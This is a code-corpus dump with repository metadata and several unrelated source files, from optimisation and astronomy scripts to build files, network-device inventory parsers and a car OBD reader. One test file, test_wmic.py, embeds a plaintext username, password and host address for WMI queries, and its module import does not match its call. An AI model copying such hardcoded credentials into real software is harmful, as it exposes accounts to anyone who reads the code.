blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
aa65658df4f8fc95e1ef9915be1117aaa44c049c
|
b76384bdcf39605ace17ee51c7902743cb315a00
|
/opt/random_optimiser.py
|
b714186e31d9b24ce2b148f18caa5544bbd1cec0
|
[
"MIT"
] |
permissive
|
RemiLehe/dragonfly
|
c13c54ad106edb4de8f46c8adc44052f926d3685
|
950bee976b8dc5157e84236ce6fd3d4ec5612521
|
refs/heads/master
| 2022-08-15T05:04:57.176391
| 2018-09-08T01:05:33
| 2018-09-08T01:05:33
| 148,205,116
| 1
| 0
|
MIT
| 2018-09-10T19:04:34
| 2018-09-10T19:04:33
| null |
UTF-8
|
Python
| false
| false
| 7,013
|
py
|
"""
Implements some instances of a random optimiser.
-- kandasamy@cs.cmu.edu
"""
# pylint: disable=invalid-name
from argparse import Namespace
import numpy as np
# Local imports
import exd.domains as domains
from exd.exd_utils import get_euclidean_initial_qinfos
from exd.exd_core import mf_exd_args
from opt.blackbox_optimiser import BlackboxOptimiser, blackbox_opt_args, \
CalledMFOptimiserWithSFCaller
from utils.option_handler import load_options
from utils.reporters import get_reporter
from utils.general_utils import map_to_bounds
random_optimiser_args = blackbox_opt_args
euclidean_random_optimiser_args = random_optimiser_args
mf_euclidean_random_optimiser_args = euclidean_random_optimiser_args + mf_exd_args
# Base class for Random Optimisation -----------------------------------------------
class RandomOptimiser(BlackboxOptimiser):
""" A class which optimises using random evaluations. """
#pylint: disable=attribute-defined-outside-init
#pylint: disable=abstract-method
# Constructor.
def __init__(self, func_caller, worker_manager, options=None, reporter=None):
""" Constructor. """
self.reporter = get_reporter(reporter)
if options is None:
options = load_options(random_optimiser_args, reporter=reporter)
super(RandomOptimiser, self).__init__(func_caller, worker_manager, model=None,
options=options, reporter=self.reporter)
def _opt_method_set_up(self):
""" Any set up specific to otptimisation. """
pass
def _get_method_str(self):
""" Returns a string describing the method. """
return 'rand'
def _add_data_to_model(self, qinfos):
""" Adds data to model. """
pass
def _child_build_new_model(self):
""" Builds a new model. """
pass
# Random optimiser for Euclidean spaces --------------------------------------------
class EuclideanRandomOptimiser(RandomOptimiser):
""" A class which optimises in Euclidean spaces using random evaluations. """
def is_an_mf_method(self):
""" Returns False since this is not a MF method. """
return False
def _determine_next_query(self):
""" Determines the next query. """
qinfo = Namespace(point=map_to_bounds(np.random.random(self.domain.dim),
self.domain.bounds))
return qinfo
def _determine_next_batch_of_queries(self, batch_size):
""" Determines the next batch of queries. """
qinfos = [self._determine_next_query() for _ in range(batch_size)]
return qinfos
def _get_initial_qinfos(self, num_init_evals):
""" Returns initial qinfos. """
return get_euclidean_initial_qinfos(self.options.init_method, num_init_evals,
self.domain.bounds)
# Multi-fidelity Random Optimiser for Euclidean Spaces -------------------------------
class MFEuclideanRandomOptimiser(RandomOptimiser):
""" A class which optimises in Euclidean spaces using random evaluations and
multi-fidelity.
"""
def is_an_mf_method(self):
""" Returns Truee since this is a MF method. """
return True
# Constructor.
def __init__(self, func_caller, worker_manager, call_fidel_to_opt_prob=0.25,
*args, **kwargs):
""" Constructor.
call_fidel_to_opt_prob is the probability with which we will choose
fidel_to_opt as the fidel.
"""
super(MFEuclideanRandomOptimiser, self).__init__(func_caller, worker_manager,
*args, **kwargs)
self.call_fidel_to_opt_prob = call_fidel_to_opt_prob
if not func_caller.is_mf():
raise CalledMFOptimiserWithSFCaller(self, func_caller)
def _determine_next_query(self):
""" Determines the next query. """
# An internal function which returns the next fidelity.
def _get_next_fidel():
""" Returns the next fidelity. """
if np.random.random() <= self.call_fidel_to_opt_prob:
return self.func_caller.fidel_to_opt
else:
return np.random.random(self.fidel_space.dim)
# Create and return qinfo
qinfo = Namespace(point=np.random.random(self.domain.dim),
fidel=_get_next_fidel())
return qinfo
def _determine_next_batch_of_queries(self, batch_size):
""" Determines the next batch of queries. """
qinfos = [self._determine_next_query() for _ in range(batch_size)]
return qinfos
def _get_initial_qinfos(self, num_init_evals):
""" Returns initial qinfos. """
return get_euclidean_initial_qinfos(self.options.init_method, num_init_evals,
self.domain.bounds, self.options.fidel_init_method, self.fidel_space.bounds,
self.func_caller.fidel_to_opt,
self.options.init_set_to_fidel_to_opt_with_prob)
# APIs for random optimisation ===========================================================
# An API for single fidelity optimisation
def random_optimiser_from_func_caller(func_caller, worker_manager, max_capital, mode,
options=None, reporter='default'):
""" Creates a EuclideanRandomOptimiser Object and optimises the function. """
reporter = get_reporter(reporter)
if isinstance(func_caller.domain, domains.EuclideanDomain):
optimiser_constructor = EuclideanRandomOptimiser
dflt_list_of_options = euclidean_random_optimiser_args
else:
raise ValueError('Random optimiser not implemented for domain of type %s.'%(
type(func_caller.domain)))
# Load options
if options is None:
options = load_options(dflt_list_of_options)
options.mode = mode
# Create optimiser
optimiser = optimiser_constructor(func_caller, worker_manager, options, reporter)
# optimise and return
return optimiser.optimise(max_capital)
# An API for multi-fidelity optimisation
def mf_random_optimiser_from_func_caller(func_caller, worker_manager, max_capital, mode,
options=None, reporter='default',
*args, **kwargs):
""" Creates a MF EuclideanRandomOptimiser Object and optimises the function. """
reporter = get_reporter(reporter)
if isinstance(func_caller.domain, domains.EuclideanDomain) and \
isinstance(func_caller.fidel_space, domains.EuclideanDomain):
optimiser_constructor = MFEuclideanRandomOptimiser
dflt_list_of_options = mf_euclidean_random_optimiser_args
else:
raise ValueError(('MF Random optimiser not implemented for (domain, fidel_space) '
+ 'of types (%s, %s).')%(
type(func_caller.domain), type(func_caller.fidel_space)))
# Load options
if options is None:
options = load_options(dflt_list_of_options)
options.mode = mode
# Create optimiser
optimiser = optimiser_constructor(func_caller, worker_manager, options=options,
reporter=reporter, *args, **kwargs)
# optimise and return
return optimiser.optimise(max_capital)
|
[
"kandasamy@cs.cmu.edu"
] |
kandasamy@cs.cmu.edu
|
659da2ed1830691916e79d88dcff073d2175e3ab
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/HundredRun/KUV_00486-2016/sdB_KUV_00486-2016_lc.py
|
b02b47a0574e563b9801476c5c5d0b466ad7622c
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 352
|
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[191.49438,-19.999389], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_KUV_00486-2016 /sdB_KUV_00486-2016_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
bf9a250bb60d5bd8acf6f007ac45e93468b1b0e2
|
2e8d5422aba03edc10154225db2fc39af5e98660
|
/Code/NativePython/GPUCommandList.py
|
2ba28c79817a35025ab9d8e97f51defbb8806e0e
|
[
"MIT"
] |
permissive
|
MYheavyGo/RenderPipeline
|
f500611bef020f45ac63023df206f978be887fc5
|
70002e71c25ba93f05c73d041943d07eb639641c
|
refs/heads/master
| 2021-01-15T14:49:58.756014
| 2016-01-18T15:59:14
| 2016-01-18T15:59:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,638
|
py
|
"""
RenderPipeline
Copyright (c) 2014-2015 tobspr <tobias.springer1@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
class GPUCommandList(object):
def __init__(self):
self._commands = []
def add_command(self, cmd):
self._commands.append(cmd)
def get_num_commands(self):
return len(self._commands)
def write_commands_to(self, dest, limit=32):
num_commands_written = 0
while num_commands_written < limit and self._commands:
self._commands.pop(0).write_to(dest, num_commands_written)
num_commands_written += 1
return num_commands_written
|
[
"tobias.springer1@googlemail.com"
] |
tobias.springer1@googlemail.com
|
548d1a106183486e625e18b56894ddc4126ea39c
|
dd80a584130ef1a0333429ba76c1cee0eb40df73
|
/external/chromium_org/ui/keyboard/keyboard.gyp
|
4ea3b09808b9285366865be616e0eb9ecf06483b
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
karunmatharu/Android-4.4-Pay-by-Data
|
466f4e169ede13c5835424c78e8c30ce58f885c1
|
fcb778e92d4aad525ef7a995660580f948d40bc9
|
refs/heads/master
| 2021-03-24T13:33:01.721868
| 2017-02-18T17:48:49
| 2017-02-18T17:48:49
| 81,847,777
| 0
| 2
|
MIT
| 2020-03-09T00:02:12
| 2017-02-13T16:47:00
| null |
UTF-8
|
Python
| false
| false
| 3,341
|
gyp
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'targets': [
{
'target_name': 'keyboard_resources',
'type': 'none',
'variables': {
'grit_out_dir': '<(SHARED_INTERMEDIATE_DIR)/ui/keyboard',
},
'actions': [
{
'action_name': 'keyboard_resources',
'variables': {
'grit_grd_file': 'keyboard_resources.grd',
},
'includes': [ '../../build/grit_action.gypi' ],
},
],
'includes': [ '../../build/grit_target.gypi' ],
'copies': [
{
'destination': '<(PRODUCT_DIR)',
'files': [
'<(SHARED_INTERMEDIATE_DIR)/ui/keyboard/keyboard_resources.pak',
],
},
],
},
{
'target_name': 'keyboard',
'type': '<(component)',
'dependencies': [
'../../base/base.gyp:base',
'../../base/third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'../../content/content.gyp:content_browser',
'../../ipc/ipc.gyp:ipc',
'../../skia/skia.gyp:skia',
'../../url/url.gyp:url_lib',
'../aura/aura.gyp:aura',
'../compositor/compositor.gyp:compositor',
'../events/events.gyp:events',
'../gfx/gfx.gyp:gfx',
'../ui.gyp:ui',
'keyboard_resources',
],
'defines': [
'KEYBOARD_IMPLEMENTATION',
],
'sources': [
'keyboard.cc',
'keyboard.h',
'keyboard_constants.cc',
'keyboard_constants.h',
'keyboard_controller.cc',
'keyboard_controller.h',
'keyboard_controller_observer.h',
'keyboard_controller_proxy.cc',
'keyboard_controller_proxy.h',
'keyboard_export.h',
'keyboard_switches.cc',
'keyboard_switches.h',
'keyboard_ui_controller.cc',
'keyboard_ui_controller.h',
'keyboard_ui_handler.cc',
'keyboard_ui_handler.h',
'keyboard_util.cc',
'keyboard_util.h',
]
},
{
'target_name': 'keyboard_unittests',
'type': '<(gtest_target_type)',
'dependencies': [
'../../base/base.gyp:base',
'../../base/base.gyp:test_support_base',
'../../content/content.gyp:content',
'../../skia/skia.gyp:skia',
'../../testing/gtest.gyp:gtest',
'../../url/url.gyp:url_lib',
'../aura/aura.gyp:aura',
'../aura/aura.gyp:aura_test_support',
'../compositor/compositor.gyp:compositor',
'../gfx/gfx.gyp:gfx',
'../ui.gyp:ui',
'../ui_unittests.gyp:run_ui_unittests',
'keyboard',
],
'sources': [
'keyboard_controller_unittest.cc',
],
'conditions': [
['OS=="linux" and linux_use_tcmalloc==1', {
'dependencies': [
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
],
'link_settings': {
'ldflags': ['-rdynamic'],
},
}],
['OS=="win" and win_use_allocator_shim==1', {
'dependencies': [
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
],
}],
],
},
],
}
|
[
"karun.matharu@gmail.com"
] |
karun.matharu@gmail.com
|
a9d82f50c1dec7b4eb3ff66f299c04a27101aa6f
|
6300fcf67d4fcb5387a9f0f7370a8ffe8f4097d9
|
/AutoParts/Tests/base/mixins.py
|
35bd3b4584f9a55e5747260ca009f68451a98241
|
[] |
no_license
|
Borislav-source/Final-Project
|
e34ac1cbb71e3a32ed490361d3583c2e1e8bfbc9
|
501b258d103c2e1b8947451f4bdf750709d040fd
|
refs/heads/master
| 2023-07-17T15:03:19.390774
| 2021-09-01T14:06:09
| 2021-09-01T14:06:09
| 393,977,540
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 598
|
py
|
from django.utils.timezone import now
from AutoParts.accounts.models import Profile
from AutoParts.vehicle.models import EngineModel, Manufacturer, VehicleModels, Vehicle
class ProfileWithCarMixin:
engine = EngineModel.objects.create(engine='1.8t')
vehicle_manufacturer = Manufacturer.objects.create(name='Mercedes')
vehicle_model = VehicleModels.objects.create(name='C-class', engine=engine, production_date=now())
vehicle = Vehicle.objects.create(manufacturer=vehicle_manufacturer, vehicle_type='Car', model=vehicle_model)
def tearDown(self):
self.vehicle.delete()
|
[
"tsv.borislav@gmail.com"
] |
tsv.borislav@gmail.com
|
c84e38b4c188ec5aeffcefc56fcd15de3ff96624
|
9b1e925d953e29d18451b0bcc0cf2da853d8a29f
|
/testing/test_wmic.py
|
71ef426d6ace68ee24105facbcf4c9bbffc30496
|
[] |
no_license
|
safl/levis
|
a61eeb72e620a924ed185d03988ad5ce5c39654b
|
e6f007f7f74e92c82da16c5645b3f41eb16c77cb
|
refs/heads/master
| 2016-09-06T16:47:43.456935
| 2011-03-07T20:22:19
| 2011-03-07T20:22:19
| 1,360,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,256
|
py
|
#!/usr/bin/env python
import unittest, os
import rpc
class TestKeyParsing(unittest.TestCase):
def setUp(self):
self.wmi_target = {
"host": "192.168.1.101",
"domain": "",
"user": "safl",
"pass": "bufasbufas"
}
self.queries = {
'filesize': "SELECT Name, FileSize FROM CIM_DataFile WHERE Name = 'c:\\\\hej.pst'",
'exefiles': "SELECT Name, FileSize FROM CIM_DataFile WHERE Extension = 'exe'",
'service_enum': "SELECT * FROM Win32_Service",
'service_state': "SELECT Name, State FROM Win32_Service WHERE Name = 'SysmonLog'",
'disk_enum': "SELECT * FROM Win32_LogicalDisk",
'disks': "SELECT * FROM Win32_DiskDrive",
'disk_free': "SELECT Name, DeviceID, FreeSpace FROM Win32_LogicalDisk WHERE DeviceID = 'C:'",
'cpu_enum': "SELECT * FROM Win32_Processor",
'cpu_util': "SELECT Name, DeviceID, LoadPercentage FROM Win32_Processor WHERE DeviceID = 'CPU0'",
'cpu_avg': "SELECT Name, LoadPercentage FROM Win32_Processor",
'os_enum': "SELECT * FROM Win32_OperatingSystem",
'tapedrive': "SELECT * FROM Win32_TapeDrive",
'os_uptime': "SELECT LastBootUpTime FROM Win32_OperatingSystem",
'os_mem_free_phys': "SELECT FreePhysicalMemory FROM Win32_OperatingSystem",
'os_mem_free_virt': "SELECT FreeVirtualMemory FROM Win32_OperatingSystem",
'bios': "SELECT * FROM Win32_Bios",
'perf_enum': "SELECT * FROM Win32_PerfRawData_PerfOS_System",
'perf': "SELECT * FROM Win32_PerfFormattedData",
'eventlog_enum': "SELECT CategoryString, EventCode, EventType, Logfile, SourceName, TimeGenerated, TimeWritten FROM Win32_NTLogEvent WHERE TimeWritten > '20100323193917.000000+060'",
'eventlog_describe': "SELECT * FROM Win32_NTLogEvent"
}
def test_connect_and_query(self):
(out, ret) = wmic.query(self.wmi_target, self.queries['os_enum'])
print out, ret
if __name__ == '__main__':
unittest.main()
|
[
"safl@safl.dk"
] |
safl@safl.dk
|
3bf22289b93db09ad9e3ef68a0b53fb48f6a960e
|
028d788c0fa48a8cb0cc6990a471e8cd46f6ec50
|
/Python-OOP/Exam/project/fish/base_fish.py
|
56973ffd676945dedddedc868c3419b8b1d3ed8c
|
[] |
no_license
|
Sheko1/SoftUni
|
d6b8e79ae545116f4c0e5705ad842f12d77a9c9d
|
a9fbeec13a30231b6a97c2b22bb35257ac1481c0
|
refs/heads/main
| 2023-07-13T15:39:48.826925
| 2021-08-21T12:51:02
| 2021-08-21T12:51:02
| 317,266,200
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,055
|
py
|
from abc import ABC, abstractmethod
class BaseFish(ABC):
size_to_increase = 5
def __init__(self, name: str, species: str, size: int, price: float):
self.name = name
self.species = species
self.size = size
self.price = price
@property
def name(self):
return self.__name
@name.setter
def name(self, value):
if not value:
raise ValueError("Fish name cannot be an empty string.")
self.__name = value
@property
def species(self):
return self.__species
@species.setter
def species(self, value):
if not value:
raise ValueError("Fish species cannot be an empty string.")
self.__species = value
@property
def price(self):
return self.__price
@price.setter
def price(self, value):
if value <= 0:
raise ValueError("Price cannot be equal to or below zero.")
self.__price = value
@abstractmethod
def eat(self):
self.size += self.size_to_increase
|
[
"martinkypar@gmail.com"
] |
martinkypar@gmail.com
|
49c315b88481e4a6d78a623438fcbeda3f56a89d
|
e2e8d2462bcd97fe94b959e8d541f9856b136357
|
/ENV/lib/python3.5/site-packages/pyrogram/api/functions/messages/get_game_high_scores.py
|
dbe17ff41a0be895d46d862131acaeb138dd7eb8
|
[
"MIT"
] |
permissive
|
wasweisic/CryptoPredicted
|
a8babd459ab1da634014830be77615356d0200f7
|
7f660cdc456fb8252b3125028f31fd6f5a3ceea5
|
refs/heads/master
| 2023-04-12T12:34:29.317983
| 2021-02-01T13:07:18
| 2021-02-01T13:07:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,368
|
py
|
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2018 Dan Tès <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.api.core import *
class GetGameHighScores(Object):
"""Attributes:
ID: ``0xe822649d``
Args:
peer: Either :obj:`InputPeerEmpty <pyrogram.api.types.InputPeerEmpty>`, :obj:`InputPeerSelf <pyrogram.api.types.InputPeerSelf>`, :obj:`InputPeerChat <pyrogram.api.types.InputPeerChat>`, :obj:`InputPeerUser <pyrogram.api.types.InputPeerUser>` or :obj:`InputPeerChannel <pyrogram.api.types.InputPeerChannel>`
id: ``int`` ``32-bit``
user_id: Either :obj:`InputUserEmpty <pyrogram.api.types.InputUserEmpty>`, :obj:`InputUserSelf <pyrogram.api.types.InputUserSelf>` or :obj:`InputUser <pyrogram.api.types.InputUser>`
Raises:
:obj:`Error <pyrogram.Error>`
Returns:
:obj:`messages.HighScores <pyrogram.api.types.messages.HighScores>`
"""
ID = 0xe822649d
def __init__(self, peer, id: int, user_id):
self.peer = peer # InputPeer
self.id = id # int
self.user_id = user_id # InputUser
@staticmethod
def read(b: BytesIO, *args) -> "GetGameHighScores":
# No flags
peer = Object.read(b)
id = Int.read(b)
user_id = Object.read(b)
return GetGameHighScores(peer, id, user_id)
def write(self) -> bytes:
b = BytesIO()
b.write(Int(self.ID, False))
# No flags
b.write(self.peer.write())
b.write(Int(self.id))
b.write(self.user_id.write())
return b.getvalue()
|
[
"justdoitzlol@gmail.com"
] |
justdoitzlol@gmail.com
|
9fb483bd59a64a4079e937ff1466937a02383c7e
|
48894ae68f0234e263d325470178d67ab313c73e
|
/sa/profiles/Arista/EOS/get_inventory.py
|
b981153e1be44768007d5d21e68c85dc6a016ed1
|
[
"BSD-3-Clause"
] |
permissive
|
DreamerDDL/noc
|
7f949f55bb2c02c15ac2cc46bc62d957aee43a86
|
2ab0ab7718bb7116da2c3953efd466757e11d9ce
|
refs/heads/master
| 2021-05-10T18:22:53.678588
| 2015-06-29T12:28:20
| 2015-06-29T12:28:20
| 118,628,133
| 0
| 0
| null | 2018-01-23T15:19:51
| 2018-01-23T15:19:51
| null |
UTF-8
|
Python
| false
| false
| 3,559
|
py
|
# -*- coding: utf-8 -*-
##----------------------------------------------------------------------
## Arista.EOS.get_inventory
##----------------------------------------------------------------------
## Copyright (C) 2007-2013 The NOC Project
## See LICENSE for details
##----------------------------------------------------------------------
## Python modules
import re
## NOC modules
from noc.sa.script import Script as NOCScript
from noc.sa.interfaces.igetinventory import IGetInventory
from noc.lib.text import parse_table
class Script(NOCScript):
name = "Arista.EOS.get_inventory"
cache = True
implements = [IGetInventory]
rx_section = re.compile("System has (\d+) (.+?)$", re.MULTILINE)
def execute(self):
objects = []
v = self.cli("show inventory")
sections = self.rx_section.split(v)
objects += self.parse_chassis(sections.pop(0))
while sections:
cnt, type, data = sections[:3]
sections = sections[3:]
t = type.lower()
if t.startswith("power supply"):
objects += self.parse_psu(data)
elif t.startswith("fan"):
objects += self.parse_fan(data)
elif t.startswith("transceiver"):
objects += self.parse_transceiver(data)
return objects
@classmethod
def parse_chassis(cls, data):
objects = []
parts = data.split("\n\n")
# Chassis section
_, ctable = parts[0].split("\n", 1)
n = 0
for part_no, description in parse_table(ctable):
objects += [{
"type": "CHASSIS",
"number": str(n),
"vendor": "ARISTA",
"serial": None,
"description": description,
"part_no": part_no,
"revision": None,
"builtin": False
}]
n += 1
# Serial/revision section
n = 0
for rev, serial, mfg_data in parse_table(parts[1]):
objects[n]["revision"] = rev
objects[n]["serial"] = serial
n += 1
return objects
@classmethod
def parse_psu(cls, data):
objects = []
for slot, part_no, serial in parse_table(data.strip()):
objects += [{
"type": "PWR",
"number": slot,
"vendor": "ARISTA",
"serial": serial,
"part_no": part_no,
"builtin": False
}]
return objects
@classmethod
def parse_fan(cls, data):
objects = []
for slot, nfans, part_no, serial in parse_table(data.strip()):
objects += [{
"type": "FAN",
"number": slot,
"vendor": "ARISTA",
"serial": serial,
"part_no": part_no,
"builtin": False
}]
return objects
@classmethod
def parse_transceiver(cls, data):
objects = []
for port, vendor, part_no, serial, rev in parse_table(data.strip()):
vendor = vendor.upper()
if vendor == "NOT PRESENT":
continue
if vendor == "ARISTA NETWORKS":
vendor = "ARISTA"
objects += [{
"type": "XCVR",
"number": port,
"vendor": vendor,
"serial": serial,
"part_no": part_no,
"builtin": False
}]
return objects
|
[
"dv@nocproject.org"
] |
dv@nocproject.org
|
46b93892928e8b45940441867657548a521a2644
|
364020e5cb0f057f4e63b8e0c43a03c565bb249d
|
/panda/examples/query_vin_and_stats.py
|
f3d6c198aff9f1485743a904d083deab4cee5fb4
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
Gernby/openpilot
|
fb7c9e607be438334aaf48e338de7f07343a7873
|
d8da18ed546637a8d6a00d2b4c9dfafb90d2a4dd
|
refs/heads/devel
| 2020-04-05T02:04:56.217699
| 2019-07-01T21:15:34
| 2019-07-01T21:15:34
| 156,462,811
| 38
| 75
|
MIT
| 2020-04-25T21:01:31
| 2018-11-06T23:34:08
|
C++
|
UTF-8
|
Python
| false
| false
| 1,723
|
py
|
#!/usr/bin/env python
import time
import struct
from panda import Panda
from hexdump import hexdump
from panda.python.isotp import isotp_send, isotp_recv
# 0x7e0 = Toyota
# 0x18DB33F1 for Honda?
def get_current_data_for_pid(pid):
# 01 xx = Show current data
isotp_send(panda, "\x01"+chr(pid), 0x7e0)
return isotp_recv(panda, 0x7e8)
def get_supported_pids():
ret = []
pid = 0
while 1:
supported = struct.unpack(">I", get_current_data_for_pid(pid)[2:])[0]
for i in range(1+pid, 0x21+pid):
if supported & 0x80000000:
ret.append(i)
supported <<= 1
pid += 0x20
if pid not in ret:
break
return ret
if __name__ == "__main__":
panda = Panda()
panda.set_safety_mode(Panda.SAFETY_ELM327)
panda.can_clear(0)
# 09 02 = Get VIN
isotp_send(panda, "\x09\x02", 0x7df)
ret = isotp_recv(panda, 0x7e8)
hexdump(ret)
print "VIN: %s" % ret[2:]
# 03 = get DTCS
isotp_send(panda, "\x03", 0x7e0)
dtcs = isotp_recv(panda, 0x7e8)
print "DTCs:", dtcs[2:].encode("hex")
supported_pids = get_supported_pids()
print "Supported PIDs:",supported_pids
while 1:
speed = struct.unpack(">B", get_current_data_for_pid(13)[2:])[0] # kph
rpm = struct.unpack(">H", get_current_data_for_pid(12)[2:])[0]/4.0 # revs
throttle = struct.unpack(">B", get_current_data_for_pid(17)[2:])[0]/255.0 * 100 # percent
temp = struct.unpack(">B", get_current_data_for_pid(5)[2:])[0] - 40 # degrees C
load = struct.unpack(">B", get_current_data_for_pid(4)[2:])[0]/255.0 * 100 # percent
print "%d KPH, %d RPM, %.1f%% Throttle, %d deg C, %.1f%% load" % (speed, rpm, throttle, temp, load)
time.sleep(0.2)
|
[
"user@comma.ai"
] |
user@comma.ai
|
3b3efdfad9fac7e5373bbc3882ccc7ed1d90ec0f
|
afc87a0ecde9869df0802d6ad79d18d9722727d8
|
/oregon/home/templatetags/home_d3tags.py
|
c524d18698e81791c61541dc6872a722ddcb0dd8
|
[] |
no_license
|
hobson/oregon
|
cc005e5fb158142cb0879db1bae73b040815cc3a
|
4cd3cc8696db25f531839dbda4c903357df27e58
|
refs/heads/master
| 2021-01-19T03:23:29.595855
| 2013-10-01T05:57:40
| 2013-10-01T05:57:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 497
|
py
|
from django.core.serializers import serialize
from django.core.serializers.json import DjangoJSONEncoder
from django.db.models.query import QuerySet
from django.template import Library
from django.utils import simplejson
register = Library()
#@register.filter(name='jsonify')
def jsonify(object):
if isinstance(object, QuerySet):
return serialize('json', object)
return simplejson.dumps(object, cls=DjangoJSONEncoder)
jsonify.is_safe=True
register.filter('jsonify', jsonify)
|
[
"hobsonlane@gmail.com"
] |
hobsonlane@gmail.com
|
6856c56c7c43315dc8a2657bc9746e449d89c043
|
56fdddd67821db9bb21dc2f851a1ae3b22256429
|
/s1level41.py
|
0c008ae52c1c1f555652671295617d095ad07e47
|
[
"Unlicense"
] |
permissive
|
gemeraldsfilms/code-org-python
|
359276751a08d6a66ca5199dbdd1004c5d4eccd1
|
bd6e0871de3e23d3e94212caf94d57997b504134
|
refs/heads/master
| 2021-01-14T11:25:58.986699
| 2014-10-31T18:21:33
| 2014-10-31T18:21:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
import codestudio
artist = codestudio.load('s1level41')
for count in range(10):
artist.pen.color = 'random'
for count in range(4):
artist.move_forward(20)
artist.turn_right(90)
artist.move_forward(20)
artist.check()
|
[
"rob@skilstak.com"
] |
rob@skilstak.com
|
1023ebd93d98f3012ed40bb1e458b458c8d3cddf
|
875a711df288d33778e2ae876f8f67490c91a7a1
|
/PathMangerExamples.py
|
f64b79ab66d397fdd0efb3a13b2f0faacbcb5338
|
[] |
no_license
|
zethwillie/chrlx_pipe
|
4c45bd51591a6dbdbe848da348ae3835569397d7
|
7c69818c125fc01a07a7294bd8d34d28a61f04bc
|
refs/heads/master
| 2021-01-22T21:17:56.259480
| 2017-08-18T04:28:11
| 2017-08-18T04:28:11
| 100,672,617
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,630
|
py
|
from chrlx.utils import PathManager
path = PathManager("G:\jobs\charlex_testArea_T60173\W_psultan\scenes\shot010\lgt\workshop\T60173W_010_std_software.01.ma")
#job info determined by folder structure
print "jobNumber:", path.jobNumber
print "jobDirname:", path.jobDirname
print "jobShortname:", path.jobShortname
print "jobType:", path.jobType
print "jobPath:", path.jobPath
print "spotLetter:", path.spotLetter
print "spotDirname:", path.spotDirname
print "spotFullname:", path.spotFullname
print "spotShortname:", path.spotShortname
print "spotSchema:", path.spotSchema
print "spotPath:", path.spotPath
print "projectPath:", path.projectPath
print "configPath:", path.configPath
